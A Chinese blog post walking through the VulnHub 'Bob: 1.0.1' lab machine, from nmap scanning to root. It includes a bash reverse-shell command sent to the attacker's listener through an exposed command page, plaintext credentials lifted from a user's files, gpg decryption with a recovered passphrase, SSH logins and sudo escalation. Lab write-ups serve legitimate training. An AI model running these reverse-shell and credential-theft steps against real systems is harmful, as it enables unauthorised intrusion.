Bob: 1.0.1打靶渗透【附代码】(权限提升)

于 2024-08-05 20:22:37 发布
阅读量591 收藏 6
点赞数 12
分类专栏: 打靶日常 文章标签: 网络安全 笔记 学习 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/140936030
版权

靶场下载地址:

https://www.vulnhub.com/entry/bob-101,226/icon-default.png?t=N7T8https://www.vulnhub.com/entry/bob-101,226/

1. 主机发现+端口扫描+目录扫描+敏感信息收集

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:99:96:9F'

1.2. 端口扫描

nmap -p- 192.168.7.152

1.3. 目录扫描

dirb http://192.168.7.152

1.4. 敏感信息收集

2. WEB打点寻找漏洞点+GetShell

2.1. 进入80端口,拼接/robots.txt文件

逐个拼接尝试 ->

/dev_shell.php是一个命令执行窗口;

/lat_memo.html是一个提示窗口;

/passwords.html也是一个提示框,总体来说,/dev_shell.php命令执行窗口具有最大的利用价值

2.2. 拼接/dev_shell.php,利用命令执行寻找漏洞点

1.输入whoami | ls,发现存在备份文件dev_shell.php.bak

2.拼接dev_shell.php.bak下载备份文件【提前将杀软关闭,小心误删】 -> 用记事本文档打开

存在一些过滤规则

2.3. 尝试反弹shell

1.打开kali监听 -> 命令执行窗口插入反弹shell语句

nc -lvnp 4444
pwd&echo "bash -i >& /dev/tcp/192.168.7.36/4444 0>&1" | bash

成功反弹

3. 权限提升

3.1. 老规矩,查看用户权限

suod -l #不大能利用

3.2.逐个排查文件

1.进入家目录查看

cd /home #到家目录一个查看

2.找到我们查看web时,一个经常出现的名字->bob,进去看看

3.到bob目录下查看,发现一个可能存在密码的文件.old_passwordfile.html

4.查看详细信息,得到两个账号密码

cat  .old_passwordfile.html
#账号密码
# jc:Qwerty
# seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

5.在Documents目录下发现一个加密的文件login.txt.gpg 和一个目录 Secret【后边有用】

cd Documents

6.在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh -> 查看文件内容 -> 不知道干嘛的,找了点文献才知道是“藏头诗”😫得到密钥:【HARPOCRATES

7.解密 login.txt.gpg ,没有权限

gpg -d login.txt.gpg

通过端口扫描,尝试ssh登录 -> 是我们刚才挖到的jc用户,输入密码【Qwerty】成功登陆!

ssh jc@192.168.7.152 -p 25468

5.再次解密 -> 得到bob密码【bob:b0bcat_

cd /home/bob/Documents/
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

3.3.尝试用bob账号连接ssh

ssh bob@192.168.7.152 -p 25468

老规矩查看用户权限,

sudo -l

好好好~👏,权限all,直接提权!

sudo su

Kucei
关注
  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2668
迟到的文章,就当库存发出来吧~
vulnhub Bob: 1.0.1
箭雨镜屋
04-27 1549
渗透思路:nmap扫描----通过robots.txt得到/dev_shell目录----利用RCE得到反弹shell----找到.gpg文件密码并解密----sudo su提权
红队打靶:W1R3S: 1.0.1详细打靶思路(vulnhub)
Bossfrank的博客
05-30 3506
本文是vulnhub靶机W1R3S: 1.0.1详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 1888
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机:JANGOW: 1.0.1(192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
【Vulnhub靶场】NAPPING: 1.0.1
DG_s1mple
04-01 6122
环境准备 下载靶机导入到vmware 攻击机IP地址为:192.168.2.18 靶机IP地址为:192.168.2.16 信息收集 我们使用nmap扫描一下靶机开放的端口信息 靶机开放了ssh跟http服务 我们首先访问一下他的http服务 是一个登录界面,并且可以注册账号,我们先注册一下 有一个文本框,我们测试一下功能 发现我们输入什么网站,他就跳转到什么网站,这么会存在Tabnabbing攻击 使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 2966
一次打靶记录。
靶机【B2R】Bob:1.0.1
干铮的博客
09-26 1127
Bob:1.0.1 下载链接 https://download.vulnhub.com/bob/Bob_v1.0.1.ova 将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。 1.信息收集 根据已知靶机mac地址查询ip。 确定目标IP Nmap -sP 192.168.43.0/24 端口扫描 Nmap 192.168.43.169 -A -p- -oN namp.A C:\Users\ASUS>Nmap 192.168.43.169 -A -p-
靶机渗透测试(Dina: 1.0.1)
@小张小张的博客
12-07 1606
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(====) 描述:It wated for kTheBox flag进度:2/2 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 靶机ip为: 192.168.10.133 2. nmap进行靶机端口服务扫描 命令:
Missing artifact javax.transaction:jta:jar:1.0.1B解决办法
Caster_Saber的专栏
09-29 3882
就是本地maven库中缺少了这个jar,需要把这个jar安装到本地库中去。 1、下载包含此jar的zip包,地址: http://download.csdn.net/detail/spring123tt/6847843 2、cmd到zip包的目录,运行下面的字符串 mvn install:install-file   -Dfile=./jta-1_0_1B-classe
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
解决Missing artifact javax.transaction:jta:jar:1.0.1B
12-12
1. 解压文件得到:jta-1_0_1B-classes.zip 2. cmd进入zip文件所在目录 ...mvn install:install-file -Dfile=./jta-1_0_1B-classes.zip -DgroupId=javax.transaction -DartifactId=jta -Dversion=1.0.1B -Dpackaging=jar
phpMyCore:1.0.1 Beta版
02-12
**phpMyCore 1.0.1 Beta版详解** phpMyCore是一款基于PHP语言开发的开源Web框架,专为构建动态网站和Web应用程序而设计。这个版本是1.0.1 Beta,意味着它是一个测试阶段的版本,可能包含一些已知或未知的问题,但...
mq-msgpush-sdk-1.0.1.jar
05-24
《mq-msgpush-sdk-1.0.1.jar:消息推送SDK详解及应用实践》 在IT行业中,消息推送服务已经成为应用程序与用户互动的关键组件。mq-msgpush-sdk-1.0.1.jar是一个专用于消息推送的Java软件开发工具包(SDK),它允许...
emas-services-1.0.1.jar
09-17
<!... ... <artifactId>emas-services <version>1.0.1 mvn install:install-file -DgroupId=com.aliyun.ams -DartifactId=emas-services -Dversion=1.0.1 -Dpackaging=jar -Dfile=F:\jars\emas-services-1.0.1.jar
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8363
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
鸿蒙笔记--装饰器
ljt2724960661的博客
08-04 186
这一节主要了解一下鸿蒙里的装饰器,装饰器是一种特殊的语法结构...
LeetCode刷题笔记 | 3 | 无重复字符的最长子串 | 双指针 | 滑动窗口 | 2025兴业银行秋招笔试题 | 哈希集合
最新发布
神马都会亿点点的毛毛张
08-04 803
这是一道银行的面试题,就是简单?!
学习笔记--算法(双指针)2
weixin_71085457的博客
08-01 591
学习笔记,自用!!
b2b-communication-api:1.0.1.jar
12-16
b2b-communication-api:1.0.1.jar 是一个B2B(企业对企业)通信接口的Java库,版本号为1.0.1。 这个API库旨在提供企业之间的通信接口,帮助不同的企业系统进行数据交换、通信和合作。它提供了一系列的函数和方法,使得企业可以轻松地与其他企业建立通信连接,并交换各种数据类型,如订单、发票、库存等等。 它的主要特点和功能包括: - 提供了一套统一的接口和协议,使得企业间通信更加方便和高效。 - 支持多种通信协议,例如HTTP、SOAP、REST等,以满足不同企业系统的需求。 - 具有消息传递和异步通知的功能,可以实现实时的数据交换和与其他企业系统的同步。 - 提供了数据加密和安全认证机制,确保数据传输的安全性和完整性。 - 可以灵活地扩展和定制,以满足企业的特定要求和业务流程。 - 提供了详细的文档和示例代码,方便企业开发人员快速上手和集成到现有系统中。 通过使用b2b-communication-api:1.0.1.jar,企业可以实现与其他企业的便捷通信,提高合作效率,加强业务合作关系,并降低数据传输和通信的成本。这个API库的引入可以使得企业间的通信更加简单、高效和安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值